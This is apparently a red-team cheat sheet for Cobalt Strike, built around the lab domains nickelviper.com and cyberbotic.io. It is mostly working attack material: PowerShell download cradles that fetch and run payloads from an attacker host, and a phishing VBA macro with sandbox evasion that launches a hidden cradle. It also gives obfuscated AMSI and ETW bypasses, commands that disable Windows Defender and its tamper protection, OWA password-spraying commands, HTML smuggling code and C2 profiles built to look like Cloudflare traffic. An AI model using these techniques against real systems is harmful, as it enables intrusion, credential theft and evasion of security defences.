Miscellaneous & Command & Control Infrastructure
Quick Commands
Usage: Essential utilities for payload hosting and network testing.
# Host payloads using Python HTTP server
$ python3 -m http.server 80
# Alternative: Use updog for better file upload capabilities
$ updog -p 80 --ssl
# Test outbound connectivity to TeamServer
beacon> powerpick Invoke-WebRequest -Uri http://nickelviper.com/a -UseBasicParsing
# Firewall management (modern syntax with improved OPSEC)
beacon> powerpick New-NetFirewallRule -DisplayName "Windows Update" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080 -Program "C:\Windows\System32\svchost.exe"
beacon> powerpick Remove-NetFirewallRule -DisplayName "Windows Update"
# List existing firewall rules for reconnaissance
beacon> powerpick Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'} | select DisplayName,Direction,Action | ft -AutoSize
Payload Encoding
Usage: Encode PowerShell payloads to bypass command-line restrictions and handle special characters.
# PowerShell method (UTF-16LE encoding required)
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# Linux method (recommended for accuracy)
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
# Execute encoded payload
powershell -nop -w hidden -enc <BASE64_ENCODED_PAYLOAD>
# Modern alternative: Use EncodedCommand parameter
powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <BASE64>
# OPSEC Note: Encoded commands are flagged by modern EDR. Consider alternatives:
# - Direct download cradles with AMSI bypass
# - Beacon Object Files (BOFs) for post-exploitation
# - Remote process injection instead of new PowerShell processes
Command & Control
DNS Configuration for DNS Beacon
Usage: Configure DNS infrastructure for covert C2 channels.
# DNS record setup (where IP points to TeamServer)
@ | A | 10.10.5.50
ns1 | A | 10.10.5.50
cdn | NS | ns1.nickelviper.com
# Verify DNS configuration (should return 0.0.0.0 for non-beacon queries)
$ dig @ns1.nickelviper.com test.cdn.nickelviper.com +short
$ nslookup test.cdn.nickelviper.com ns1.nickelviper.com
# Use cdn.nickelviper.com as DNS Host (Stager) in Listener Configuration
# OPSEC: DNS beacons generate predictable patterns; monitor query volume
# Advanced: DNS over HTTPS (DoH) configuration for better evasion
# Configure in malleable C2 profile:
dns-beacon {
set dns_idle "8.8.8.8"; # Legitimate DNS for idle queries
set dns_sleep "0"; # No sleep between queries
set maxdns "255"; # Maximum DNS TXT record size
set dns_stager_prepend ".stage.";
set dns_stager_subhost ".nickelviper.com";
set dns_max_txt "252";
set dns_ttl "5";
}
TeamServer Setup
Manual Start
# Start TeamServer with custom C2 profile
$ sudo ./teamserver 10.10.5.50 'StrongP@ssw0rd!' c2-profiles/normal/webbug.profile
# OPSEC: Always use strong passwords and custom profiles
# Validate profile before starting
$ ./c2lint c2-profiles/normal/webbug.profile
# Enable additional logging for debugging
$ sudo ./teamserver 10.10.5.50 'StrongP@ssw0rd!' c2-profiles/normal/webbug.profile >> /var/log/cobaltstrike.log 2>&1
Service Configuration
Usage: Run TeamServer as a persistent systemd service with automatic restart.
# Create systemd service file with improved security
$ sudo vim /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network-online.target
Wants=network-online.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=10
User=root
WorkingDirectory=/opt/cobaltstrike
ExecStart=/opt/cobaltstrike/teamserver 10.10.5.50 'StrongP@ssw0rd!' /opt/cobaltstrike/profiles/custom.profile
StandardOutput=append:/var/log/cobaltstrike/teamserver.log
StandardError=append:/var/log/cobaltstrike/teamserver-error.log
# Security hardening
NoNewPrivileges=false
PrivateTmp=true
ProtectSystem=strict
ReadWritePaths=/opt/cobaltstrike
[Install]
WantedBy=multi-user.target
# Create log directory
$ sudo mkdir -p /var/log/cobaltstrike
# Service management
$ sudo systemctl daemon-reload
$ sudo systemctl enable teamserver.service
$ sudo systemctl start teamserver.service
$ sudo systemctl status teamserver.service
# View logs
$ sudo journalctl -u teamserver.service -f
Automated Web Delivery Setup
Usage: Automatically host payloads using Aggressor Script in headless mode.
# Create host_payloads.cna script (improved version)
$ cat > host_payloads.cna << 'EOF'
# Auto-host payloads on teamserver start
on ready {
println("[+] Teamserver ready, hosting payloads...");
# Generate stageless x64 PowerShell payload
$payload = artifact_payload("http", "powershell", "x64");
# Host on multiple URIs for redundancy
site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "PowerShell Stager", false);
site_host("10.10.5.50", 80, "/updates", $payload, "text/plain", "Updates Endpoint", false);
# Generate and host HTA payload
$hta = artifact_payload("http", "hta", "x64");
site_host("10.10.5.50", 80, "/invoice.hta", $hta, "application/hta", "HTA Payload", false);
println("[+] Payloads hosted successfully");
}
EOF
# Update systemd service to load script
ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /opt/cobaltstrike/agscript 127.0.0.1 50050 headless StrongP@ssw0rd! /opt/cobaltstrike/scripts/host_payloads.cna &'
# OPSEC: Rotate URIs regularly and use realistic naming conventions
Custom C2 Profile
Usage: Enhanced malleable C2 profile with current browser fingerprinting and improved evasion.
# Modern C2 Profile - Updated 2024
# Mimics Chrome 120+ on Windows 11
set sleeptime "10000"; # 10 seconds
set jitter "30"; # 30% jitter for irregular beaconing
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36";
set host_stage "false"; # Disable staging for better OPSEC
# Process injection configuration
post-ex {
set amsi_disable "true";
# Modern process targets (Windows 10/11)
set spawnto_x86 "%windir%\\syswow64\\wermgr.exe"; # Windows Error Reporting
set spawnto_x64 "%windir%\\sysnative\\wermgr.exe";
# Alternative OPSEC-safe targets
# set spawnto_x86 "%windir%\\syswow64\\SearchProtocolHost.exe";
# set spawnto_x64 "%windir%\\sysnative\\RuntimeBroker.exe";
set pipename "mojo.###.###.###"; # Chrome DevTools pipe pattern
set keylogger "GetAsyncKeyState";
# Obfuscate post-ex jobs
set obfuscate "true";
set smartinject "true";
}
# Process execution controls
process-inject {
set allocator "NtMapViewOfSection"; # Better than VirtualAllocEx
set min_alloc "16700";
set startrwx "false";
set userwx "false";
transform-x86 {
prepend "\x90\x90"; # NOP sled
}
transform-x64 {
prepend "\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread-s;
CreateRemoteThread;
}
}
# HTTP GET Configuration
http-get {
set uri "/api/v2/metrics /cdn-cgi/challenge /static/chunks";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.9";
header "Accept-Encoding" "gzip, deflate, br";
header "Sec-Fetch-Dest" "document";
header "Sec-Fetch-Mode" "navigate";
header "Sec-Fetch-Site" "none";
header "Sec-Ch-Ua" "\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"";
header "Sec-Ch-Ua-Mobile" "?0";
header "Sec-Ch-Ua-Platform" "\"Windows\"";
header "Upgrade-Insecure-Requests" "1";
parameter "session" "random";
parameter "v" "1.0";
metadata {
base64url;
prepend "session=";
header "Cookie";
}
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Server" "cloudflare";
header "X-Frame-Options" "SAMEORIGIN";
header "X-Content-Type-Options" "nosniff";
header "Strict-Transport-Security" "max-age=31536000";
header "CF-Ray" "8a1b2c3d4e5f6g7h-LAX";
output {
netbios;
prepend "{\"status\":\"success\",\"data\":\"";
append "\",\"timestamp\":" "1704067200}";
print;
}
}
}
# HTTP POST Configuration
http-post {
set uri "/api/v2/events /graphql /cdn-cgi/trace";
set verb "POST";
client {
header "Content-Type" "application/json";
header "Accept" "*/*";
header "Accept-Encoding" "gzip, deflate, br";
header "Sec-Fetch-Dest" "empty";
header "Sec-Fetch-Mode" "cors";
header "Sec-Fetch-Site" "same-origin";
id {
base64url;
prepend "{\"client_id\":\"";
append "\",\"events\":[";
print;
}
output {
base64url;
prepend "{\"type\":\"interaction\",\"data\":\"";
append "\"}]}";
print;
}
}
server {
header "Content-Type" "application/json";
header "Server" "cloudflare";
header "Access-Control-Allow-Origin" "*";
output {
netbios;
prepend "{\"success\":true,\"message\":\"";
append "\"}";
print;
}
}
}
# HTTP Stager Configuration
http-stager {
set uri_x86 "/js/bundle-x86.js";
set uri_x64 "/js/bundle-x64.js";
client {
header "Accept" "*/*";
header "Accept-Encoding" "gzip, deflate, br";
header "Sec-Fetch-Dest" "script";
header "Sec-Fetch-Mode" "no-cors";
}
server {
header "Content-Type" "application/javascript; charset=utf-8";
header "Server" "cloudflare";
header "Cache-Control" "public, max-age=31536000";
output {
print;
}
}
}
# HTTPS Certificate Configuration
https-certificate {
set CN "cloudflare.com";
set O "Cloudflare, Inc.";
set C "US";
set L "San Francisco";
set OU "Engineering";
set ST "California";
set validity "365";
}
# Code signing certificate (if available)
code-signer {
set keystore "keystore.jks";
set password "password123";
set alias "codesign";
}
# SMB Beacon Configuration
set pipename "msagent_###"; # Mimics Microsoft telemetry
set pipename_stager "status_##";
# TCP Beacon Configuration
set tcp_port "4444";
# DNS Beacon Configuration (if using DNS)
dns-beacon {
set dns_idle "8.8.8.8";
set dns_max_txt "252";
set dns_sleep "0";
set dns_stager_prepend ".stage.";
set dns_stager_subhost ".nickelviper.com";
set dns_ttl "5";
set maxdns "255";
}
Initial Access & Evasion
Artifact Kit Compilation
Usage: Compile custom artifact kit to evade signature-based detection.
# Modern Artifact Kit compilation (Cobalt Strike 4.5+)
$ cd /opt/cobaltstrike/arsenal-kit/kits/artifact
# Compile with custom allocator and syscalls
$ ./build.sh pipe NtMapViewOfSection 310272 5 true false /opt/cobaltstrike/artifacts
# Parameters explained:
# - pipe: Named pipe for communication
# - NtMapViewOfSection: Memory allocator (stealthier than VirtualAlloc)
# - 310272: Stageless payload max size (adjust based on your beacon)
# - 5: XOR iterations
# - true: Enable syscalls (better OPSEC)
# - false: Disable sleep mask obfuscation (enable if needed)
# Compile Resource Kit for script artifacts
$ cd /opt/cobaltstrike/arsenal-kit/kits/resource
$ ./build.sh /opt/cobaltstrike/resources
# OPSEC Note: Recompile artifacts for each engagement
# Modern EDR uses behavioral analytics, not just signatures
# Alternative: Use custom obfuscators
$ cd /opt/cobaltstrike/arsenal-kit/kits/artifact
# Edit src-common/bypass-pipe.c to add custom evasion logic
# Example: Add timing checks, sandbox detection, API hashing
Payload Testing & Validation
Usage: Test payloads against current AV/EDR before deployment.
# Test executable payload with ThreatCheck
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Release\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe -e Defender
# Modern alternative: AMSITrigger for PowerShell scripts
PS> C:\Tools\AMSITrigger\AMSITrigger.exe -i C:\Payloads\http_x64.ps1 -f 3
# Test against AMSI
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Release\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
# Advanced: Test with DefenderCheck (identifies specific signatures)
PS> C:\Tools\DefenderCheck\DefenderCheck.exe C:\Payloads\beacon.exe
# Automated payload generation in Cobalt Strike
# Load custom CNA script for automatic obfuscation
beacon> load /opt/cobaltstrike/scripts/payload-generator.cna
# Generate all stageless payloads with obfuscation
# Cobalt Strike > Payloads > Windows Stageless Generate All Payloads
# Enable: Obfuscate, Sign Binary (if cert available), Artifact Kit
# OPSEC: Always test on isolated VM with target AV/EDR before live deployment
C2 Profile AMSI & ETW Configuration
Usage: Configure malleable profile for advanced evasion.
# Enhanced post-exploitation configuration
post-ex {
# AMSI bypass for powerpick, execute-assembly, psinject
set amsi_disable "true";
# Patch ETW (Event Tracing for Windows) - Critical for modern evasion
set etw_disable "true"; # Available in CS 4.5+
# Smart process injection (avoids cross-session injection)
set smartinject "true";
# Obfuscate post-ex DLLs
set obfuscate "true";
# Modern spawn targets (Windows 10 22H2+)
set spawnto_x86 "%windir%\\syswow64\\wermgr.exe";
set spawnto_x64 "%windir%\\sysnative\\wermgr.exe";
# Alternative low-profile processes
# set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
# set spawnto_x64 "%windir%\\sysnative\\backgroundTaskHost.exe";
# Named pipe obfuscation (mimics legitimate Windows pipes)
set pipename "mojo.###.###.###"; # Chrome pipes
# set pipename "crashpad_###_###"; # Chromium crash reporting
# set pipename "PSHost.###.###.###"; # PowerShell remoting
# Keylogger method
set keylogger "SetWindowsHookEx"; # Less detected than GetAsyncKeyState
}
# Process injection advanced configuration
process-inject {
# Use indirect syscalls for injection
set allocator "NtMapViewOfSection"; # Stealthier than VirtualAllocEx
set min_alloc "17500"; # Minimum allocation size
set startrwx "false"; # Don't start with RWX memory
set userwx "false"; # Don't use RWX pages
# Prepend padding to avoid signature detection
transform-x86 {
prepend "\x90\x90\x90"; # NOP sled
}
transform-x64 {
prepend "\x90\x90\x90";
}
# Execution methods (order matters)
execute {
CreateThread "ntdll!RtlUserThreadStart+0x1000"; # Offset from common detection
CreateThread;
NtQueueApcThread-s; # Self-injection via APC
CreateRemoteThread;
RtlCreateUserThread;
}
}
# Memory protection configuration
stage {
set userwx "false";
set cleanup "true"; # Clean up after staging
set stomppe "true"; # Stomp PE headers
set obfuscate "true"; # Obfuscate beacon in memory
set sleep_mask "true"; # Mask beacon when sleeping
# Module stomping (overwrite legitimate DLL in memory)
set module_x86 "wwanmm.dll"; # Rarely loaded Windows DLL
set module_x64 "wwanmm.dll";
# Transform stage before sending
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "EntryPoint";
strrep "beacon.dll" "msvcrt.dll";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "EntryPoint";
strrep "beacon.x64.dll" "ntdll.dll";
}
}
Verify C2 profile syntax:
$ ./c2lint /opt/cobaltstrike/profiles/custom.profile
# Test profile with c2concealer for OpSec improvements
$ python3 c2concealer.py --hostname nickelviper.com --profile custom.profile --variant 1
Note: `amsi_disable` and `etw_disable` only affect:
- ✅ `powerpick` (unmanaged PowerShell runspace)
- ✅ `execute-assembly` (.NET assembly execution)
- ✅ `psinject` (PowerShell injection)
- ❌ NOT the `powershell` command (uses system PowerShell)
Process Spawning Configuration (Runtime)
Usage: Configure spawn-to processes dynamically per engagement.
# Set spawn-to processes at runtime (per beacon)
beacon> spawnto x64 %windir%\sysnative\wermgr.exe
beacon> spawnto x86 %windir%\syswow64\wermgr.exe
# Verify current configuration
beacon> spawnto
# Alternative OPSEC-safe processes for different scenarios
# Standard user processes:
beacon> spawnto x64 %windir%\sysnative\backgroundTaskHost.exe
beacon> spawnto x86 %windir%\syswow64\backgroundTaskHost.exe
# System processes (requires elevation):
beacon> spawnto x64 %windir%\sysnative\svchost.exe -k netsvcs
beacon> spawnto x86 %windir%\syswow64\svchost.exe -k LocalService
# Configure default process for lateral movement
beacon> argue wermgr.exe # Set arguments for spawned process
beacon> ppid 4132 # Set parent PID (PPID spoofing)
# OPSEC: Choose processes that:
# 1. Regularly spawn children (e.g., wermgr.exe, RuntimeBroker.exe)
# 2. Match expected network behavior
# 3. Run under same privilege level as current beacon
Windows Defender Management
Usage: Disable or evade Windows Defender (requires admin privileges).
# Check current Defender status
beacon> powerpick Get-MpPreference | select DisableRealtimeMonitoring,DisableIOAVProtection,DisableBehaviorMonitoring | fl
beacon> powerpick Get-MpComputerStatus | select RealTimeProtectionEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled | fl
# Disable Defender Real-Time Protection (requires admin)
beacon> powerpick Set-MpPreference -DisableRealtimeMonitoring $true
beacon> powerpick Set-MpPreference -DisableIOAVProtection $true
beacon> powerpick Set-MpPreference -DisableIntrusionPreventionSystem $true
beacon> powerpick Set-MpPreference -DisableBehaviorMonitoring $true
beacon> powerpick Set-MpPreference -DisableScriptScanning $true
beacon> powerpick Set-MpPreference -DisableBlockAtFirstSeen $true
# Add exclusions (stealthier than disabling)
beacon> powerpick Add-MpPreference -ExclusionPath "C:\ProgramData"
beacon> powerpick Add-MpPreference -ExclusionProcess "wermgr.exe"
beacon> powerpick Add-MpPreference -ExclusionExtension "dll"
# OPSEC Alternative: Tamper Protection bypass via Registry (Windows 10/11)
beacon> shell reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
# Disable Windows Defender service entirely (highly suspicious)
beacon> shell sc config WinDefend start= disabled
beacon> shell sc stop WinDefend
# Modern approach: Use Living-off-the-Land to manipulate Defender
beacon> shell "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
# Check for Defender for Endpoint (EDR)
beacon> powerpick Get-Service -Name Sense | fl
beacon> shell sc query Sense
# CRITICAL OPSEC NOTE:
# Disabling Defender triggers alerts in managed environments
# Better approach: Use evasion techniques instead of disabling
# - AMSI bypass for in-memory execution
# - ETW patching for telemetry evasion
# - Process hollowing/module stomping
AMSI Bypass Techniques
Usage: Bypass Antimalware Scan Interface for in-memory execution.
# Method 1: Classic AmsiInitFailed bypass (patched in recent Windows)
beacon> powerpick S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Method 2: Modern AMSI bypass via memory patching (2023+)
beacon> powerpick [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 3: Matt Graeber's reflection bypass (more reliable)
beacon> powerpick [Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils').GetField('am'+'siInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 4: Advanced - Patch amsi.dll in memory
beacon> powerpick $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
# Method 5: Using BOF (Beacon Object File) - Most OPSEC safe
# Download from: https://github.com/rsmudge/CVE-2020-0796-BOF
beacon> inline-execute /opt/bofs/amsi_patch.o
# Method 6: Force AMSI to fail via COM hijacking
beacon> powerpick $amsiContext = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076); [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, $amsiContext)
# OPSEC Note: Modern Windows 11 with Defender for Endpoint detects AMSI bypass
# Better approach: Use Cobalt Strike's built-in AMSI bypass via C2 profile
# amsi_disable "true" + powerpick command
# Verify AMSI status (test with known malicious string)
beacon> powerpick 'AMSIScanBuffer'
# Alternative: Use Invoke-Obfuscation for script-level evasion
# https://github.com/danielbohannon/Invoke-Obfuscation
ETW (Event Tracing for Windows) Bypass
Usage: Disable ETW to prevent telemetry collection (modern EDR evasion).
# Method 1: Patch ETW via PowerShell reflection
beacon> powerpick [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
# Method 2: ETW patching via BOF (recommended)
# Download: https://github.com/boku7/injectEtwBypass
beacon> inline-execute /opt/bofs/etw_patch.o
# Method 3: Use NtTraceControl to disable ETW
beacon> execute-assembly C:\Tools\SharpEtwDisable\SharpEtwDisable.exe
# Method 4: Cobalt Strike C2 profile (best OPSEC)
# Add to malleable profile:
# post-ex {
# set etw_disable "true";
# }
# Verify ETW is disabled
beacon> powerpick Get-EtwTraceProvider -Guid "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}" | fl
# CRITICAL: ETW bypass is essential for:
# - .NET assembly execution (execute-assembly)
# - PowerShell post-exploitation
# - Process injection activities
Initial Compromise Techniques
OWA/Exchange Enumeration & Password Spraying
Usage: Identify valid users and conduct targeted password attacks.
# 1. Identify mail infrastructure
$ dig cyberbotic.io MX
$ dig autodiscover.cyberbotic.io
$ nmap -p 443,587,993 --script http-ntlm-info mail.cyberbotic.io
# Modern: Check for Microsoft 365
$ curl -s https://login.microsoftonline.com/getuserrealm.srf?login=user@cyberbotic.io | jq
# 2. Enumerate NetBIOS/Domain via OWA
PS> Import-Module C:\Tools\MailSniper\MailSniper.ps1
PS> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
# 3. Generate username list from OSINT
$ python3 namemash.py employees.txt > usernames.txt
# 4. Validate usernames (timing-based enumeration)
PS> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\usernames.txt -OutFile .\valid.txt -Threads 5
# Modern alternative: Use o365spray (supports MFA detection)
$ python3 o365spray.py --validate -U usernames.txt --domain cyberbotic.io
# 5. Password spraying (OPSEC-aware)
PS> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\valid.txt -Password "Summer2024!" -Threads 1 -Delay 3600
# Modern: Use o365spray with throttling
$ python3 o365spray.py --spray -U valid.txt -P passwords.txt --domain cyberbotic.io --rate 10 --safe 120
# 6. Download Global Address List (requires valid credentials)
PS> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName "cyberbotic.io\jdoe" -Password "Summer2024!" -OutFile .\gal.txt
# OPSEC Considerations:
# - Space requests 1 hour apart to avoid lockout
# - Use <5 password attempts per user per day
# - Monitor for account lockout thresholds
# - Consider using residential proxies to avoid geo-blocks
# - Check for Conditional Access Policies (Azure AD)
Malicious Office Macro
Usage: Create VBA macro for initial access via phishing.
' Modern macro with sandbox detection and staged execution
' OPSEC: Combine with thread execution hijacking or DLL sideloading
Sub AutoOpen()
' Sandbox detection
If DetectSandbox() Then
Exit Sub
End If
' Check if running in user context
If Environ("USERNAME") = "Administrator" Or Environ("USERNAME") = "admin" Then
Exit Sub
End If
' Execute payload
ExecutePayload
End Sub
Sub Workbook_Open()
AutoOpen
End Sub
Function DetectSandbox() As Boolean
On Error Resume Next
DetectSandbox = False
' Check for low RAM (VMs often have <2GB)
If CreateObject("WScript.Shell").Environment("SYSTEM")("NUMBER_OF_PROCESSORS") < 2 Then
DetectSandbox = True
Exit Function
End If
' Check for recent file activity
If Dir("C:\Users\" & Environ("USERNAME") & "\Documents\*.docx") = "" Then
DetectSandbox = True
Exit Function
End If
' Time-based delay (sandboxes timeout quickly)
Dim StartTime As Double
StartTime = Timer
Do While Timer < StartTime + 90 ' 90 second delay
DoEvents
Loop
End Function
Sub ExecutePayload()
Dim objShell As Object
Dim strCommand As String
Set objShell = CreateObject("WScript.Shell")
' Method 1: PowerShell download cradle (requires AMSI bypass)
strCommand = "powershell.exe -nop -w hidden -ep bypass -c ""IEX(New-Object Net.WebClient).DownloadString('http://nickelviper.com/stage1')"""
' Method 2: mshta for HTA execution (alternative)
' strCommand = "mshta.exe http://nickelviper.com/payload.hta"
' Method 3: certutil for file download + execution
' strCommand = "cmd.exe /c certutil -urlcache -f http://nickelviper.com/update.exe %TEMP%\svchost.exe && %TEMP%\svchost.exe"
' Execute with hidden window
objShell.Run strCommand, 0, False
Set objShell = Nothing
End Sub
Modern alternatives to VBA macros:
# 1. Excel 4.0 XLM Macros (bypasses modern macro security)
# Use tool: https://github.com/outflanknl/EvilClippy
$ python EvilClippy.py -s payload.txt invoice.xlsm
# 2. OneNote attachments with embedded executables
# OneNote files (.one) allow embedded files with minimal warnings
# 3. ISO/IMG files with LNK + payload
# Windows 11 mounts ISO files automatically
$ genisoimage -o payload.iso -J -r payload_folder/
# 4. HTML Smuggling (bypasses email gateways)
<script>
var blob = new Blob([atob("TVqQAAMAAAAEAAAA...")], {type: 'application/octet-stream'});
var url = window.URL.createObjectURL(blob);
var a = document.createElement('a');
a.href = url;
a.download = 'invoice.exe';
a.click();
</script>
# 5. Container files (.7z, .rar) with password "infected"
# Bypasses most email scanning (password-protected archives)
$ 7z a -pinfected -mhe=on payload.7z beacon.exe